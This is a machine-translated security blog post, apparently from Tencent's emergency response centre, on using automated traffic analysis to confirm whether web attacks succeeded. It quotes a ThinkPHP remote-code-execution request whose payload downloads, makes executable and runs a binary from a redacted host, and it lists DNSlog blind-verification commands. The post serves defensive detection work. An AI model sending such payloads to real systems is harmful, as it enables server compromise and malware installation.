当前位置:网站首页>Threat discovery under automated data analysis
Threat discovery under automated data analysis
2022-06-24 05:22:00 【Tencent Security Emergency Response Center】
background
I don't remember how long ago , Probably 2020 year 9 month 3 Number 15 spot 37 branch 25 second 181 MS has written an article about data analysis in the process of information collection ( Link to the original text ), Some readers may ask , Why do I remember such a precise time so clearly , because — by — I — blind — Ed — Of . Get down to business , Here is the focus of this article , in general , These two articles are actually about data analysis . An analysis of the data used in the attack process , This article is a sister to the previous one , Then focus on the data analysis used in safe operation , That is, enterprise defense ;
break the ice !
Before starting the article , Let's start with an attack HTTP package ( Source order IP And other information are omitted ), Readers might as well think about it first , From this HTTP What useful information can we get or restore in the package ?
GET /index.php?s=/index/\thinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom; chmod 777 /tmp/.bom; /tmp/.bom thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Host:x.x.x.x
In general , Some readers may focus on HTTP To analyze the contents of the package , For example, attack tactics and so on , For some experienced safety engineers, it can even be pointed out that this is for thinkPHP A loophole in the . But actually , In fact, there are more information hidden under the iceberg , And want to dig the information under the iceberg , We first need to reason about all possible paths according to the evolution process , I simplified it to the following figure :
in general , The information we get falls into two categories , The direct message is this HTTP Basic information about the package , Including time 、 Attack methods, etc ; The indirect information covers all possible information in the subsequent evolution of the attack , Include process 、 process 、 Communications, etc .
Why do that ? Because in the actual operation, we find that it is difficult to complete the closed-loop alarm by simply relying on direct information or simply relying on indirect information . For example, take the direct information of the attack as an example , We WAF There are countless alarms like the above every day , Basically no operability . However, if we use automatic data analysis for direct and indirect information, we can filter false positives at the same time , Realize high accuracy alarm .
so what ?
Just now we mentioned why we should do automated data analysis , I believe readers are more curious about how to do it , My team is the traffic analysis team , Therefore, using traffic to realize automatic data analysis is a major focus of this paper .
Next, we will still use the example just now to illustrate , First , The first question to think about is :“ Why can't direct information form an effective alarm ?”, Simply put, we don't know whether it has been successfully executed , So here we move the perspective back , If there is indirect information to support the successful implementation , So this actually forms a complete chain of evidence . It's like your ex girlfriend was proposed on Tanabata , You may want to know whether it is successful , Although they are not present, you can decide whether they have a wedding in the near future 、 Whether the marriage proposal is successful or not depends on whether the marriage certificate is obtained . ad locum , The author simply combs the following events that can be used as evidence in the case just now :
● The server executes the download file command
● The server is or has downloaded the file
● The server is executing or has executed the file
● External communication exists during the execution of this file
Sum up , If any of the above behaviors can be confirmed on the basis of the attack behavior , Can we confirm that the attack was successful . Besides , The benefits of doing so are obvious , Using data analysis instead of simply using traditional rules can not only reduce the maintenance of rules , Improve versatility , At the same time, it is more accurate in alarm operation .
How do you do it? ?
Specific application process , It's kind of like putting an elephant in a refrigerator , The first step is to extract the complete command string , And can realize the simple analysis of the command string ; The second step is to modify the file ( If you have any ) Perform sandbox analysis , At the same time, it can extract relevant rules according to the current attack type , And issue the extracted rules to the corresponding safety equipment ; The third step is to use NTA and EDR、 The scanner correlates the data of each security device , Realize alarm operation ;
The first step is to extract the complete command string , There are many ways , The first is more traditional , The idea is also relatively simple , Yes, complete HTTP Request to parse , Split the parameters and parameter values in the request into dictionary forms ( Whether it's get、post Content or cookie Content ), After that, common commands for parameter values are extracted through corresponding regularization , It's a simple way , However, the problem of relative missing and false positives is more prominent ; The second way is to implement many similar requests at the same time , While containing malicious requests , It also contains normal requests for this interface , The extraction of command string is realized by using the difference between normal request and attack request . There are relatively few false positives in this way , But the cost is relatively high .
wget http://x.x.x.x/bins/bom.x86 -O /tmp/.bom; chmod 777 /tmp/.bom; /tmp/.bom thinkphp
After the extracted command string through the above steps , The following processing is relatively simple , There are also two ways , First, use. python Its own syntax parsing library shelx, Use it directly split Methods lexical analysis of commands , Of course, you can also directly use regularization for pattern matching , Then extract URL、 Orders, etc .
['wget', 'http://x.x.x.x/bins/bom.x86', '-O', '/tmp/.bom;', 'chmod', '777', '/tmp/.bom;', '/tmp/.bom', 'thinkphp']
The second step is to download the file remotely according to the string command , At the same time, use sandboxes to analyze executable files , Extract the... Corresponding to the file IOC, At the same time, it can also issue corresponding detection rules to various security devices .
The third step is relatively simple , The main thing is to get the relevant process 、 Network and other relevant data , At the same time, some requests requiring secondary confirmation can also be submitted to the scanner , Finally, through the similar time 、 Confirm whether the association is successful by command similarity and other methods , Of course, graph correlation operation can also be used here to realize correlation , I will not go into details here .
To use !
In fact, I have passed this small case here , You can basically understand the idea of data analysis , Of course, there are different scenarios , The correlation and output of data analysis are naturally different , To make a long story short , The idea is to analyze and reason all the processes of the attack behavior . Last , On the basis of what has been mentioned above , Take a small case of practical application of data analysis .
Case a
Through data analysis, we can obtain the data for blind print verification dnslog domain name 、ip Etc , Used to feed back security policies . For example, the following modes are commonly used in blind printing :
nslookup ad323xzxs[.]qq[.]com ping ad323xzxs[.]qq[.]com dig ad323xzxs[.]qq[.]com dig ad323xzxs @x.x.x.x curl http://qq[.]com/i/c204f5/5dig/hgl5/ curl ad323xzxs[.]qq[.]com ......
We first get all the domain names stored in the database through the first step , After that, the root domain name used by the attacker for authentication can be obtained by processing according to different modes , For example nslookup ad323xzxs.qq.com This model , You can disassemble all domain names to get the root domain name of all domain names , after group by To deal with , Finally, we can get the result simply through quantitative judgment , And the domain names finally obtained can be fed back into the strategy . Here's the picture :
Case 2
Through data analysis, the request for suspected vulnerabilities is submitted to the scanner for scanning or the spread of new vulnerabilities is found . As mentioned above, the normal request and the band paylaod The request can be attacked payload, meanwhile , After this step, you can actually get the location of normal requests and injection points . And we can according to paylaod To rate the likelihood of the vulnerability , For example, if there is the behavior of dragging the library, you can give a high score , Finally, the request for high scores is directly submitted to the scanner for secondary scanning . Of course, the same principle applies to the discovery of new vulnerability propagation , But the specific treatment is slightly different .
End !
Readers see here , The end of this paper , Welcome to communicate through message or comment .
About the aegis traffic security analysis team
Aegis traffic security analysis team belongs to Tencent Security Platform Department , Relying on Tencent Security Platform Department's 15 years of security experience, we will build a company level security system , Focus on traffic based attack detection 、 Intrusion detection 、 Construction and landing of traffic blocking and Threat Intelligence , Constantly mining security risks in traffic and broadening application scenarios , Combined with big data 、AI And other cutting-edge technologies , Build network traffic defense system in depth .
边栏推荐
- PHP end() function
- How the query address of cloud native monitoring data exposes the public network
- Talk about team management: how to build your own management system!
- Analysis of PHP environment configuration
- Shuttle global levitation button
- Hard core JS: there may be a memory leak in your program
- How to apply for company website domain name how to build a website after domain name registration
- How does win10 turn off f1~f12 shortcut keys?
- What is a top-level domain name? Is it expensive to register a domain name
- What is an ECS? ECS、BCC、CVM...
猜你喜欢

014_ TimePicker time selector

Hard core observation 553 AI needs to identify almost everyone in the world with hundreds of billions of photos

Leetcode question brushing (question 3) - the longest substring without repeated characters

Intensive learning and application of "glory of the king" to complete the application of 7 real worlds other than human players

How should we learn cloud native in 2022?

Answer questions! This article explains the automated testing framework in software testing from beginning to end
Learning routes and materials for cloud native O & M engineers

CTF learning notes 17:iwesec file upload vulnerability-02 file name filtering bypass

Leetcode (question 2) - adding two numbers

What are the disadvantages of the free IP address replacement tool?
随机推荐
Webmeng: create a website you are proud of
Analysis of electronic signature system
Blackmail virus prevention guide
Tencent conference rest API x-tc-registered parameter policy update notification
PHP ksort() function
What is the relationship between IP address and domain name? How to select a domain name?
Zero code implements one-to-one table relationship and cascading save of infinite primary and child tables
How does the mobile phone remotely connect to the ECS? What should be paid attention to during the operation
What is the use of domain name cloud resolution? What are the factors for domain name errors
How unity runs code every few frames
API service orchestration platform, full web visual orchestration
Simple use of cache functions
What is a domain name server? What are the types of domain name servers?
Live video: real time large screen analysis based on streaming computing Oceanus (Flink)
What is cloud server? How to access the ECS Homepage
How to register a domain name how to make the domain name short and easy to remember
CMU cs15-445 lecture01 relationship model course notes
Spirit breath development log (12)
The function of nearby people in the applet is realized, and the cloud development database is used to realize nearby people and friends within a distance of the neighborhood
Detailed explanation of the process after the browser enters the domain name and web address